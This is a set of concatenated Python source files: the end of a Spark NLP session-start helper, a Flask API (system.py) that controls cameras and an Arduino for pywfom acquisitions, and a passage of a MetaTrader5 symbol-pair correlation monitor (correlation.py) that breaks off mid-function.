output_level : int, optional
Output level for logs, by default 1
Returns
-------
:class:`SparkSession`
The initiated Spark session.
"""
current_version = "3.3.4"
class SparkNLPConfig:
def __init__(self):
self.master, self.app_name = "local[*]", "Spark NLP"
self.serializer, self.serializer_max_buffer = "org.apache.spark.serializer.KryoSerializer", "2000M"
self.driver_max_result_size = "0"
# Spark NLP on Apache Spark 3.0.x
self.maven_spark = "com.johnsnowlabs.nlp:spark-nlp_2.12:{}".format(current_version)
self.maven_gpu_spark = "com.johnsnowlabs.nlp:spark-nlp-gpu_2.12:{}".format(current_version)
# Spark NLP on Apache Spark 2.4.x
self.maven_spark24 = "com.johnsnowlabs.nlp:spark-nlp-spark24_2.11:{}".format(current_version)
self.maven_gpu_spark24 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark24_2.11:{}".format(current_version)
# Spark NLP on Apache Spark 2.3.x
self.maven_spark23 = "com.johnsnowlabs.nlp:spark-nlp-spark23_2.11:{}".format(current_version)
self.maven_gpu_spark23 = "com.johnsnowlabs.nlp:spark-nlp-gpu-spark23_2.11:{}".format(current_version)
def start_without_realtime_output():
builder = SparkSession.builder \
.appName(spark_nlp_config.app_name) \
.master(spark_nlp_config.master) \
.config("spark.driver.memory", memory) \
.config("spark.serializer", spark_nlp_config.serializer) \
.config("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer) \
.config("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if gpu and spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark23)
elif gpu and spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark24)
elif spark23:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark23)
elif spark24:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark24)
elif gpu:
builder.config("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
builder.config("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
builder.config("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
builder.config("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
builder.config("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
return builder.getOrCreate()
def start_with_realtime_output():
class SparkWithCustomGateway:
def __init__(self):
spark_conf = SparkConf()
spark_conf.setAppName(spark_nlp_config.app_name)
spark_conf.setMaster(spark_nlp_config.master)
spark_conf.set("spark.driver.memory", memory)
spark_conf.set("spark.serializer", spark_nlp_config.serializer)
spark_conf.set("spark.kryoserializer.buffer.max", spark_nlp_config.serializer_max_buffer)
spark_conf.set("spark.driver.maxResultSize", spark_nlp_config.driver_max_result_size)
if gpu:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_gpu_spark)
else:
spark_conf.set("spark.jars.packages", spark_nlp_config.maven_spark)
if cache_folder != '':
spark_conf.config("spark.jsl.settings.pretrained.cache_folder", cache_folder)
if log_folder != '':
spark_conf.config("spark.jsl.settings.annotator.log_folder", log_folder)
if cluster_tmp_dir != '':
spark_conf.config("spark.jsl.settings.storage.cluster_tmp_dir", cluster_tmp_dir)
# Make the py4j JVM stdout and stderr available without buffering
popen_kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
'bufsize': 0
}
# Launch the gateway with our custom settings
self.gateway = launch_gateway(conf=spark_conf, popen_kwargs=popen_kwargs)
self.process = self.gateway.proc
# Use the gateway we launched
spark_context = SparkContext(gateway=self.gateway)
self.spark_session = SparkSession(spark_context)
self.out_thread = threading.Thread(target=self.output_reader)
self.error_thread = threading.Thread(target=self.error_reader)
self.std_background_listeners()
def std_background_listeners(self):
self.out_thread.start()
self.error_thread.start()
def output_reader(self):
for line in iter(self.process.stdout.readline, b''):
print('{0}'.format(line.decode('utf-8')), end='')
def error_reader(self):
RED = '\033[91m'
RESET = '\033[0m'
for line in iter(self.process.stderr.readline, b''):
if output_level == 0:
print(RED + '{0}'.format(line.decode('utf-8')) + RESET, end='')
else:
# output just info
pass
def shutdown(self):
self.spark_session.stop()
self.gateway.shutdown()
self.process.communicate()
self.out_thread.join()
self.error_thread.join()
return SparkWithCustomGateway()
spark_nlp_config = SparkNLPConfig()
if real_time_output:
if spark23 or spark24:
spark_session = start_without_realtime_output()
return spark_session
else:
# Available from Spark 3.0.x
class SparkRealTimeOutput:
def __init__(self):
self.__spark_with_custom_gateway = start_with_realtime_output()
self.spark_session = self.__spark_with_custom_gateway.spark_session
def shutdown(self):
self.__spark_with_custom_gateway.shutdown()
return SparkRealTimeOutput()
else:
spark_session = start_without_realtime_output()
return spark_session
def version():
"""Returns the current Spark NLP version.
Returns
-------
str
The current Spark NLP version.
"""
return '3.3.4'
|
system.py
|
from flask import request, jsonify, session
from tqdm import tqdm
import traceback, json, time, os, datetime, threading, pywfom
import numpy as np
from . import api
from .. import models
from ...devices.arduino import Arduino
from ...devices.camera import Camera
DEFAULT_FILE = {
"directory":os.environ['PYWFOM_DIR'] if 'PYWFOM_DIR' in os.environ else None,
"number_of_runs":"",
"run_length":"",
"run_length_unit":"sec"
}
# ****** Create Controllable System ********
class _SystemException(Exception):
pass
class _System(object):
"""docstring for _System."""
def __init__(self):
self.arduino = Arduino()
self.cameras = []
self.file = DEFAULT_FILE
self.acquiring = False
self.username = None
self.mouse = None
self.write_speed = 0
self.primary_framerate = 0
def benchmark_disk(self):
pass
def set_from_file(self, path):
# Clear existing settings
self.delete()
# Start system from specified path, otherwise ignore
with open(path, 'r') as f:
settings = json.load(f)
self.post(None, settings)
f.close()
def set_from_user_default(self, user, pwd):
# Clear existing settings
self.delete()
self.username = user
# Retrieve settings from MongoDB
default = models.User.objects(username=user, password=pwd).get().default
# Post the settings
self.post(id=None, settings=json.loads(default.to_json()))
def get(self, setting=None):
resp = {
"file":self.file,
"cameras":[cam.json() for cam in self.cameras],
"arduino":self.arduino.json() if self.arduino else {},
"username":self.username,
"mouse":self.mouse
}
if not setting:
return resp
elif setting in resp:
return resp[setting]
else:
return self.cameras[int(setting)].json()
def delete(self, id=None):
if id == None:
self.file = {}
_ = self.arduino.close() if self.arduino else None
self.arduino = None
[cam.close() for cam in self.cameras]
self.cameras = []
elif id == 'file':
self.file = {}
elif id == 'arduino':
_ = self.arduino.close() if self.arduino else None
self.arduino = None
elif id == 'cameras':
[cam.close() for cam in self.cameras]
self.cameras = []
else:
cam = self.cameras.pop(int(id))
cam.close()
return f"Successfully delete {id}", 200
def put(self, id=None, settings={}):
if id == 'file':
self.file == settings
elif id == 'arduino':
if not self.arduino:
return "Arduino is not initialized", 400
else:
self.arduino.set(**settings)
elif id == 'mouse':
self.mouse = settings
else:
self.cameras[int(id)].set(**settings)
return self.get(id)
def post(self, id=None, settings={}):
if id == 'file':
self.file = settings
elif id == 'cameras':
_newcam = Camera(**settings)
self.cameras.append( _newcam )
return _newcam.json()
elif id == 'arduino':
if self.arduino:
return "Cannot POST to Initialized Arduino", 400
else:
self.arduino = Arduino(**settings)
elif id == None:
self.file = settings['file']
self.cameras = [Camera(**config) for config in settings['cameras']]
self.arduino = Arduino(**settings['arduino'])
else:
setattr(self, id, settings)
return self.get(id)
def stop_acquisition(self):
self.acquiring = False
def check_acquisition_settings(self):
if self.acquiring:
return ["All Good"]
else:
errors = []
# Check run settings
for key in ['run_length', 'run_length_unit', 'number_of_runs', 'directory']:
if not self.file[key]:
errors.append(f"{key} is missing from file settings")
# CAMERA SETTINGS
_camera_settings = [cam.json() for cam in self.cameras]
# Check number of cameras
if len(_camera_settings) == 0:
errors.append("No cameras have been added")
# Assert proper number of primary cameras
_primary_fr = [cam['framerate'] for cam in _camera_settings if cam['primary']]
if len(_primary_fr) == 0:
errors.append("You must specify a primary camera")
elif len(_primary_fr) > 1:
error.append("You can only specify one primary camera")
else:
self.primary_framerate = _primary_fr[0]
_over = [cam['framerate'] < fr for cam in _camera_settings if not cam['primary']]
# TODO: Ensure cameras aren't going over their maximum framerate
# Check additional data settings
for key in ['username', 'mouse']:
if not getattr(self, key):
errors.append(f"{key} was not specified")
return errors
def start_acquisition(self):
print("Starting an acquisition")
path = os.path.join(self.file['directory'], datetime.datetime.now().strftime('%m_%d_%Y_%H%M%S'))
os.mkdir(path)
for cam in self.cameras:
cam.acquiring = True
for i in tqdm(range(int(self.file['number_of_runs'])), unit="run"):
run = self._create_run()
if not run:
break
else:
os.mkdir(f"{path}/run{i}")
rl, rlu = self.file['run_length'], self.file['run_length_unit']
num_frames = self.primary_framerate*rl*{"sec":1,"min":60,"hr":3600}[rlu]
for j in tqdm(range(int(num_frames)), leave=False, unit="frame"):
# Place latest frame from each camera in dict
frames = {
f"{cam.id}":cam.acquired_frames.get() for cam in self.cameras
}
# Create thread arguments
args = (f"{path}/run{i}/frame{j}.npz", frames, run,)
# Start a thread to write to file and mongodb
threading.Thread(target=self._write_to_file, args=args).start()
run.save()
for cam in self.cameras:
cam.acquiring = False
return True, []
def _create_run(self):
# Check to see if MongoDB keys are valid
try:
mouse = models.Mouse.objects(name=self.mouse).get()
user = models.User.objects(username=self.username).get()
config = models.Configuration(
file=self.file,
arduino=self.arduino.json(),
cameras=[cam.json() for cam in self.cameras]
).save()
return models.Run(mouse=mouse,user=user,configuration=config,frames=[], timestamp=datetime.datetime.now())
except Exception as e:
traceback.print_exc()
return None
def _write_to_file(self, fname, frames, run):
np.savez(fname, **frames)
frame = models.Frame(file=fname)
frame.save()
run.frames.append(frame)
# ****** Initialize System System ********
system = _System()
# ************* System Settings API Calls ******************
@api.route('/system/settings', methods=['GET'])
@api.route('/system/settings/<id>', methods=['GET'])
def get_settings(id=None):
# Retrieve the current settings of the session
return jsonify( system.get(id) )
@api.route('/system/settings', methods=['POST'])
@api.route('/system/settings/<id>', methods=['POST'])
def post_settings(id=None):
# Add settings to the current session
return jsonify( system.post(id, request.get_json()) )
@api.route('/system/settings/<id>', methods=['PUT'])
def put_settings(id):
# Adjust settings in the current session
return jsonify( system.put(id, request.get_json()) )
@api.route('/system/settings', methods=["DELETE"])
@api.route('/system/settings/<id>', methods=["DELETE"])
def delete_settings(id=None):
# Delete settings in the current session
return system.delete(id)
@api.route('/system/acquisition', methods=["GET"])
def get_acquisition():
return jsonify(system.check_acquisition_settings())
@api.route('/system/acquisition', methods=["DELETE"])
def stop_acquisition():
return "Success", 200
@api.route('/system/acquisition', methods=['POST'])
def start_acquisition():
try:
system.start_acquisition()
return "Success", 200
except Exception as e:
traceback.print_exc()
return str(e), 404
|
correlation.py
|
import math
import logging
import pandas as pd
from datetime import datetime, timedelta
import time
import sched
import threading
import pytz
from scipy.stats.stats import pearsonr
import pickle
import inspect
import sys
from mt5_correlation.mt5 import MT5
class CorrelationStatus:
"""
The status of the monitoring event for a symbol pair.
"""
val = None
text = None
long_text = None
def __init__(self, status_val, status_text, status_long_text=None):
"""
Creates a status.
:param status_val:
:param status_text:
:param status_long_text
:return:
"""
self.val = status_val
self.text = status_text
self.long_text = status_long_text
def __eq__(self, other):
"""
Compare the status val. We can compare against other CorrelationStatus instances or against int.
:param other:
:return:
"""
if isinstance(other, self.__class__):
return self.val == other.val
elif isinstance(other, int):
return self.val == other
else:
return False
def __str__(self):
"""
str is the text for the status.
:return:
"""
return self.text
# All status's for symbol pair from monitoring. Status set from assessing coefficient for all timeframes from last run.
STATUS_NOT_CALCULATED = CorrelationStatus(-1, 'NOT CALC', 'Coefficient could not be calculated')
STATUS_CORRELATED = CorrelationStatus(1, 'CORRELATED', 'Coefficients for all timeframes are equal to or above the '
'divergence threshold')
STATUS_DIVERGED = CorrelationStatus(2, 'DIVERGED', 'Coefficients for all timeframes are below the divergence threshold')
STATUS_INCONSISTENT = CorrelationStatus(3, 'INCONSISTENT', 'Coefficients not consistently above or below divergence '
'threshold and are neither trending towards divergence or '
'convergence')
STATUS_DIVERGING = CorrelationStatus(4, 'DIVERGING', 'Coefficients, when ordered by timeframe, are trending '
'towards convergence. The shortest timeframe is below the '
'divergence threshold and the longest timeframe is above the '
'divergence threshold')
STATUS_CONVERGING = CorrelationStatus(5, 'CONVERGING', 'Coefficients, when ordered by timeframe, are trending '
'towards divergence. The shortest timeframe is above the '
'divergence threshold and the longest timeframe is below the '
'divergence threshold')
class Correlation:
"""
A class to maintain the state of the calculated correlation coefficients.
"""
# Connection to MetaTrader5
__mt5 = None
# Minimum base coefficient for monitoring. Symbol pairs with a lower correlation
# coefficient than ths won't be monitored.
monitoring_threshold = 0.9
# Threshold for divergence. Correlation coefficients that were previously above the monitoring_threshold and fall
# below this threshold will be considered as having diverged
divergence_threshold = 0.8
# Flag to determine we monitor and report on inverse correlations
monitor_inverse = False
# Toggle on whether we are monitoring or not. Set through start_monitor and stop_monitor
__monitoring = False
# Monitoring calculation params, interval, cache_time, autosave and filename. Passed to start_monitor
__monitoring_params = []
__interval = None
__cache_time = None
__autosave = None
__filename = None
# First run of scheduler
__first_run = True
# The price data used to calculate the correlations
__price_data = None
# Coefficient data and history. Will be created in init call to __reset_coefficient_data
coefficient_data = None
coefficient_history = None
# Stores tick data used to calculate coefficient during Monitor.
# Dict: {Symbol: [retrieved datetime, ticks dataframe]}
__monitor_tick_data = {}
def __init__(self, monitoring_threshold=0.9, divergence_threshold=0.8, monitor_inverse=False):
"""
Initialises the Correlation class.
:param monitoring_threshold: Only correlations that are greater than or equal to this threshold will be
monitored.
:param divergence_threshold: Correlations that are being monitored and fall below this threshold are considered
to have diverged.
:param monitor_inverse: Whether we will monitor and report on negative / inverse correlations.
"""
# Logger
self.__log = logging.getLogger(__name__)
# Connection to MetaTrader5
self.__mt5 = MT5()
# Create dataframe for coefficient data
self.__reset_coefficient_data()
# Create timer for continuous monitoring
self.__scheduler = sched.scheduler(time.time, time.sleep)
# Set thresholds and flags
self.monitoring_threshold = monitoring_threshold
self.divergence_threshold = divergence_threshold
self.monitor_inverse = monitor_inverse
@property
def filtered_coefficient_data(self):
"""
:return: Coefficient data filtered so that all base coefficients >= monitoring_threshold
"""
filtered_data = None
if self.coefficient_data is not None:
if self.monitor_inverse:
filtered_data = self.coefficient_data \
.loc[(self.coefficient_data['Base Coefficient'] >= self.monitoring_threshold) |
(self.coefficient_data['Base Coefficient'] <= self.monitoring_threshold * -1)]
else:
filtered_data = self.coefficient_data.loc[self.coefficient_data['Base Coefficient'] >=
self.monitoring_threshold]
return filtered_data
@property
def diverged_symbols(self):
"""
:return: dataframe containing all diverged, diverging or converging symbols and count of number of
divergences for those symbols.
"""
filtered_data = None
if self.coefficient_data is not None:
# Only rows where we have a divergence
filtered_data = self.coefficient_data \
.loc[(self.coefficient_data['Status'] == STATUS_DIVERGED) |
(self.coefficient_data['Status'] == STATUS_DIVERGING) |
(self.coefficient_data['Status'] == STATUS_CONVERGING)]
# We only need the symbols
all_symbols = pd.DataFrame(columns=['Symbol', 'Count'],
data={'Symbol': filtered_data['Symbol 1'].append(filtered_data['Symbol 2']),
'Count': 1})
# Group and count. Reset index so that we have named SYMBOL column.
filtered_data = all_symbols.groupby(by='Symbol').count().reset_index()
# Sort
filtered_data = filtered_data.sort_values('Count', ascending=False)
return filtered_data
def load(self, filename):
"""
Loads calculated coefficients, price data used to calculate them and tick data used during monitoring.
coefficients
:param filename: The filename for the coefficient data to load.
:return:
"""
# Load data
with open(filename, 'rb') as file:
loaded_dict = pickle.load(file)
# Get data from loaded dict and save
self.coefficient_data = loaded_dict["coefficient_data"]
self.__price_data = loaded_dict["price_data"]
self.__monitor_tick_data = loaded_dict["monitor_tick_data"]
self.coefficient_history = loaded_dict["coefficient_history"]
def save(self, filename):
"""
Saves the calculated coefficients, the price data used to calculate and the tick data for monitoring to a file.
:param filename: The filename to save the data to.
:return:
"""
# Add data to dict then use pickle to save
save_dict = {"coefficient_data": self.coefficient_data, "price_data": self.__price_data,
"monitor_tick_data": self.__monitor_tick_data, "coefficient_history": self.coefficient_history}
with open(filename, 'wb') as file:
pickle.dump(save_dict, file, protocol=pickle.HIGHEST_PROTOCOL)
def calculate(self, date_from, date_to, timeframe, min_prices=100, max_set_size_diff_pct=90, overlap_pct=90,
max_p_value=0.05):
"""
Calculates correlation coefficient between all symbols in MetaTrader5 Market Watch. Updates coefficient data.
:param date_from: From date for price data from which to calculate correlation coefficients
:param date_to: To date for price data from which to calculate correlation coefficients
:param timeframe: Timeframe for price data from which to calculate correlation coefficients
:param min_prices: The minimum number of prices that should be used to calculate coefficient. If this threshold
is not met then returned coefficient will be None
:param max_set_size_diff_pct: Correlations will only be calculated if the sizes of the two price data sets are
within this pct of each other
:param overlap_pct:The dates and times in the two sets of data must match. The coefficient will only be
calculated against the dates that overlap. Any non overlapping dates will be discarded. This setting
specifies the minimum size of the overlapping data when compared to the smallest set as a %. A coefficient
will not be calculated if this threshold is not met.
:param max_p_value: The maximum p value for the correlation to be meaningful
:return:
"""
coefficient = None
# If we are monitoring, stop. We will need to restart later
was_monitoring = self.__monitoring
if self.__monitoring:
self.stop_monitor()
# Clear the existing correlations
self.__reset_coefficient_data()
# Get all visible symbols
symbols = self.__mt5.get_symbols()
# Get price data for selected symbols. 1 week of 15 min OHLC data for each symbol. Add to dict.
self.__price_data = {}
for symbol in symbols:
self.__price_data[symbol] = self.__mt5.get_prices(symbol=symbol, from_date=date_from, to_date=date_to,
timeframe=timeframe)
# Loop through all symbol pair combinations and calculate coefficient. Make sure you don't double count pairs
# eg. (USD/GBP AUD/USD vs AUD/USD USD/GBP). Use grid of all symbols with i and j axis. j starts at i + 1 to
# avoid duplicating. We will store all coefficients in a dataframe.
index = 0
# There will be (x^2 - x) / 2 pairs where x is number of symbols
num_pair_combinations = int((len(symbols) ** 2 - len(symbols)) / 2)
for i in range(0, len(symbols)):
symbol1 = symbols[i]
for j in range(i + 1, len(symbols)):
symbol2 = symbols[j]
index += 1
# Get price data for both symbols
symbol1_price_data = self.__price_data[symbol1]
symbol2_price_data = self.__price_data[symbol2]
# Get coefficient
if symbol1_price_data is not None and symbol2_price_data is not None:
coefficient = self.calculate_coefficient(symbol1_prices=symbol1_price_data,
symbol2_prices=symbol2_price_data,
min_prices=min_prices,
max_set_size_diff_pct=max_set_size_diff_pct,
overlap_pct=overlap_pct, max_p_value=max_p_value)
# Store if valid
if coefficient is not None:
self.coefficient_data = \
self.coefficient_data.append({'Symbol 1': symbol1, 'Symbol 2': symbol2,
'Base Coefficient': coefficient, 'UTC Date From': date_from,
'UTC Date To': date_to, 'Timeframe': timeframe, 'Status': ''},
ignore_index=True)
self.__log.debug(f"Pair {index} of {num_pair_combinations}: {symbol1}:{symbol2} has a "
f"coefficient of {coefficient}.")
else:
self.__log.debug(f"Coefficient for pair {index} of {num_pair_combinations}: {symbol1}:"
f"{symbol2} could no be calculated.")
# Sort, highest correlated first
self.coefficient_data = self.coefficient_data.sort_values('Base Coefficient', ascending=False)
# If we were monitoring, we stopped, so start again.
if was_monitoring:
self.start_monitor(interval=self.__interval, calculation_params=self.__monitoring_params,
cache_time=self.__cache_time, autosave=self.__autosave, filename=self.__filename)
def get_price_data(self, symbol):
"""
Returns the price data used to calculate the base coefficients for the specified symbol
:param symbol: Symbol to get price data for.
:return: price data
"""
price_data = None
if symbol in self.__price_data:
price_data = self.__price_data[symbol]
return price_data
def start_monitor(self, interval, calculation_params, cache_time=10, autosave=False, filename='autosave.cpd'):
"""
Starts monitor to continuously update the coefficient for all symbol pairs in that meet the min_coefficient
threshold.
:param interval: How often to check in seconds
:param calculation_params: A single dict or list of dicts containing the parameters for the coefficient
calculations. On every iteration, a coefficient will be calculated for every set of params in list. Params
contain the following values:
from: The number of minutes of tick data to use for calculation. This can be a single value or
a list. If a list, then calculations will be performed for every from date in list.
min_prices: The minimum number of prices that should be used to calculate coefficient. If this threshold
is not met then returned coefficient will be None
max_set_size_diff_pct: Correlations will only be calculated if the sizes of the two price data sets are
within this pct of each other
overlap_pct: The dates and times in the two sets of data must match. The coefficient will only be
calculated against the dates that overlap. Any non overlapping dates will be discarded. This
setting specifies the minimum size of the overlapping data when compared to the smallest set as a %.
A coefficient will not be calculated if this threshold is not met.
max_p_value: The maximum p value for the correlation to be meaningful
:param cache_time: Tick data is cached so that we can check coefficients for multiple symbol pairs and reuse
the tick data. Number of seconds to cache tick data for before it becomes stale.
:param autosave: Whether to autosave after every monitor run. If there is no filename specified then will
create one named autosave.cpd
:param filename: Filename for autosave. Default is autosave.cpd.
:return: correlation coefficient, or None if coefficient could not be calculated.
"""
if self.__monitoring:
self.__log.debug(f"Request to start monitor when monitor is already running. Monitor will be stopped and"
f"restarted with new parameters.")
self.stop_monitor()
self.__log.debug(f"Starting monitor.")
self.__monitoring = True
# Store the calculation params. If it isn't a list, convert to list of one to make code simpler later on.
self.__monitoring_params = calculation_params if isinstance(calculation_params, list) \
else [calculation_params, ]
# Store the other params. We will need these later if monitor is stopped and needs to be restarted. This
# happens in calculate.
self.__interval = interval
self.__cache_time = cache_time
self.__autosave = autosave
self.__filename = filename
# Create thread to run monitoring This will call private __monitor method that will run the calculation and
# keep scheduling itself while self.monitoring is True.
thread = threading.Thread(target=self.__monitor)
thread.start()
def stop_monitor(self):
"""
Stops monitoring symbol pairs for correlation.
:return:
"""
if self.__monitoring:
self.__log.debug(f"Stopping monitor.")
self.__monitoring = False
else:
self.__log.debug(f"Request to stop monitor when it is not running. No action taken.")
def calculate_coefficient(self, symbol1_prices, symbol2_prices, min_prices: int = 100,
max_set_size_diff_pct: int = 90, overlap_pct: int = 90,
max_p_value: float = 0.05):
"""
Calculates the correlation coefficient between two sets of price data. Uses close price.
:param symbol1_prices: Pandas dataframe containing prices for symbol 1
:param symbol2_prices: Pandas dataframe containing prices for symbol 2
:param min_prices: The minimum number of prices that should be used to calculate coefficient. If this threshold
is not met then returned coefficient will be None
:param max_set_size_diff_pct: Correlations will only be calculated if the sizes of the two price data sets are
within this pct of each other
:param overlap_pct:
:param max_p_value: The maximum p value for the correlation to be meaningful
:return: correlation coefficient, or None if coefficient could not be calculated.
:rtype: float or None
"""
assert symbol1_prices is not None and symbol2_prices is not None
# Calculate size of intersection and determine if prices for symbols have enough overlapping timestamps for
# correlation coefficient calculation to be meaningful. Is the smallest set at least max_set_size_diff_pct % of
# the size of the largest set and is the overlap set size at least overlap_pct % the size of the smallest set?
coefficient = None
intersect_dates = (set(symbol1_prices['time']) & set(symbol2_prices['time']))
len_smallest_set = int(min([len(symbol1_prices.index), len(symbol2_prices.index)]))
len_largest_set = int(max([len(symbol1_prices.index), len(symbol2_prices.index)]))
similar_size = len_largest_set * (max_set_size_diff_pct / 100) <= len_smallest_set
enough_overlap = len(intersect_dates) >= len_smallest_set * (overlap_pct / 100)
enough_prices = len_smallest_set >= min_prices
suitable = similar_size and enough_overlap and enough_prices
if suitable:
# Calculate coefficient on close prices
# First filter prices to only include those that intersect
symbol1_prices_filtered = symbol1_prices[symbol1_prices['time'].isin(intersect_dates)]
symbol2_prices_filtered = symbol2_prices[symbol2_prices['time'].isin(intersect_dates)]
# Calculate coefficient. Only use if p value is < max_p_value (highly likely that coefficient is valid
# and null hypothesis is false).
coefficient_with_p_value = pearsonr(symbol1_prices_filtered['close'], symbol2_prices_filtered['close'])
coefficient = None if coefficient_with_p_value[1] > max_p_value else coefficient_with_p_value[0]
# If NaN, change to None
if coefficient is not None and math.isnan(coefficient):
coefficient = None
self.__log.debug(f"Calculate coefficient returning {coefficient}. "
f"Symbol 1 Prices: {len(symbol1_prices)} Symbol 2 Prices: {len(symbol2_prices)} "
f"Overlap Prices: {len(intersect_dates)} Similar size: {similar_size} "
f"Enough overlap: {enough_overlap} Enough prices: {enough_prices} Suitable: {suitable}.")
return coefficient
def get_coefficient_history(self, filters=None):
"""
Returns the coefficient history that matches the supplied filter.
:param filters: Dict of all filters to apply. Possible values in dict are:
Symbol 1
Symbol 2
Coefficient
Timeframe
Date From
Date To
If filter is not supplied, then all history is returned.
:return: dataframe containing history of coefficient data.
"""
history = self.coefficient_history
# Apply filters
if filters is not None:
for key in filters:
if key in history.columns:
history = history[history[key] == filters[key]]
else:
self.__log.warning(f"Invalid column name provided for filter. Filter column: {key} "
f"Valid columns: {history.columns}")
return history
def clear_coefficient_history(self):
"""
Clears the coefficient history for all symbol pairs
:return:
"""
# Create dataframes for coefficient history.
coefficient_history_columns = ['Symbol 1', 'Symbol 2', 'Coefficient', 'Timeframe', 'Date To']
self.coefficient_history = pd.DataFrame(columns=coefficient_history_columns)
# Clear tick data
self.__monitor_tick_data = {}
# Clear status from coefficient data
self.coefficient_data['Status'] = ''
def get_ticks(self, symbol, date_from=None, date_to=None, cache_only=False):
"""
Returns the ticks for the specified symbol. Get's from cache if available and not older than cache_timeframe.
:param symbol: Name of symbol to get ticks for.
:param date_from: Date to get ticks from. Can only be None if getting from cache (cache_only=True)
:param date_to:Date to get ticks to. Can only be None if getting from cache (cache_only=True)
:param cache_only: Only retrieve from cache. cache_time is ignored. Returns None if symbol is not available in
cache.
:return:
"""
timezone = pytz.timezone("Etc/UTC")
utc_now = datetime.now(tz=timezone)
ticks = None
# Cache only
if cache_only:
if symbol in self.__monitor_tick_data:
ticks = self.__monitor_tick_data[symbol][1]
# Check if we have a cache time defined, if we already have the tick data and it is not stale
elif self.__cache_time is not None and symbol in self.__monitor_tick_data and utc_now < \
self.__monitor_tick_data[symbol][0] + timedelta(seconds=self.__cache_time):
# Cached ticks are not stale. Get them
ticks = self.__monitor_tick_data[symbol][1]
self.__log.debug(f"Ticks for {symbol} retrieved from cache.")
else:
# Data does not exist in cache or cached data is stale. Retrieve from source and cache.
ticks = self.__mt5.get_ticks(symbol=symbol, from_date=date_from, to_date=date_to)
self.__monitor_tick_data[symbol] = [utc_now, ticks]
self.__log.debug(f"Ticks for {symbol} retrieved from source and cached.")
return ticks
def get_last_status(self, symbol1, symbol2):
"""
Get the last status for the specified symbol pair.
:param symbol1
:param symbol2
:return: CorrelationStatus instance for symbol pair
"""
status_col = self.coefficient_data.loc[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2), 'Status']
status = status_col.values[0]
return status
def get_last_calculation(self, symbol1=None, symbol2=None):
"""
Get the last calculation time the specified symbol pair. If no symbols are specified, then gets the last
calculation time across all pairs
:param symbol1
:param symbol2
:return: last calculation time
"""
last_calc = None
if self.coefficient_data is not None and len(self.coefficient_data.index) > 0:
data = self.coefficient_data.copy()
# Filter by symbols if specified
data = data.loc[data['Symbol 1'] == symbol1] if symbol1 is not None else data
data = data.loc[data['Symbol 2'] == symbol2] if symbol2 is not None else data
# Filter to remove blank dates
data = data.dropna(subset=['Last Calculation'])
# Get the column
col = data['Last Calculation']
# Get max date from column
if col is not None and len(col) > 0:
last_calc = max(col.values)
return last_calc
def get_base_coefficient(self, symbol1, symbol2):
"""
Returns the base coefficient for the specified symbol pair
:param symbol1:
:param symbol2:
:return:
"""
base_coefficient = None
if self.coefficient_data is not None:
row = self.coefficient_data[(self.coefficient_data['Symbol 1'] == symbol1) &
(self.coefficient_data['Symbol 2'] == symbol2)]
if row is not None and len(row) == 1:
base_coefficient = row.iloc[0]['Base Coefficient']
return base_coefficient
def __monitor(self):
"""
The actual monitor method. Private. This should not be called outside of this class. Use start_monitoring and
stop_monitoring.
:return: correlation coefficient, or None if coefficient could not be calculated.
"""
self.__log.debug(f"In monitor event. Monitoring: {self.__monitoring}.")
# Only run if monitor is not stopped
if self.__monitoring:
# Update all coefficients
self.__update_all_coefficients()
# Autosave
if self.__autosave:
self.save(filename=self.__filename)
# Schedule the timer to run again
self.__scheduler.enter(delay=self.__interval, priority=1, action=self.__monitor)
# Log the stack. Debug stack overflow
self.__log.debug(f"Current stack size: {len(inspect.stack())} Recursion limit: {sys.getrecursionlimit()}")
# Run
if self.__first_run:
self.__first_run = False
self.__scheduler.run()
def __update_coefficients(self, symbol1, symbol2):
"""
Updates the coefficients for the specified symbol pair
:param symbol1: Name of symbol to calculate coefficient for.
:param symbol2: Name of symbol to calculate coefficient for.
:return: correlation coefficient, or None if coefficient could not be calculated.
"""
# Get the largest value of from in monitoring_params. This will be used to retrieve the data. We will only
# retrieve once and use for every set of params by getting subset of the data.
max_from = None
for params in self.__monitoring_params:
if max_from is None:
max_from = params['from']
else:
max_from = max(max_from, params['from'])
# Date range for data
timezone = pytz.timezone("Etc/UTC")
date_to = datetime.now(tz=timezone)
date_from = date_to - timedelta(minutes=max_from)
# Get the tick data for the longest timeframe calculation.
symbol1ticks = self.get_ticks(symbol=symbol1, date_from=date_from, date_to=date_to)
symbol2ticks = self.get_ticks(symbol=symbol2, date_from=date_from, date_to=date_to)
# Resample to 1 sec OHLC, this will help with coefficient calculation ensuring that we dont have more than
# one tick per second and ensuring that times can match. We will need to set the index to time for the
# resample then revert back to a 'time' column. We will then need to remove rows with nan in 'close' price
s1_prices = None
s2_prices = None
if symbol1ticks is not None and symbol2ticks is not None and len(symbol1ticks.index) > 0 and \
len(symbol2ticks.index) > 0:
try:
symbol1ticks = symbol1ticks.set_index('time')
symbol2ticks = symbol2ticks.set_index('time')
s1_prices = symbol1ticks['ask'].resample('1S').ohlc()
s2_prices = symbol2ticks['ask'].resample('1S').ohlc()
except RecursionError:
self.__log.warning(f"Coefficient could not be calculated for {symbol1}:{symbol2}. prices could not "
f"be resampled.")
else:
s1_prices.reset_index(inplace=True)
s2_prices.reset_index(inplace=True)
s1_prices = s1_prices[s1_prices['close'].notna()]
s2_prices = s2_prices[s2_prices['close'].notna()]
# Calculate for all sets of monitoring_params
if s1_prices is not None and s2_prices is not None:
coefficients = {}
for params in self.__monitoring_params:
# Get the from date as a datetime64
date_from_subset = pd.Timestamp(date_to - timedelta(minutes=params['from'])).to_datetime64()
# Get subset of the price data
s1_prices_subset = s1_prices[(s1_prices['time'] >= date_from_subset)]
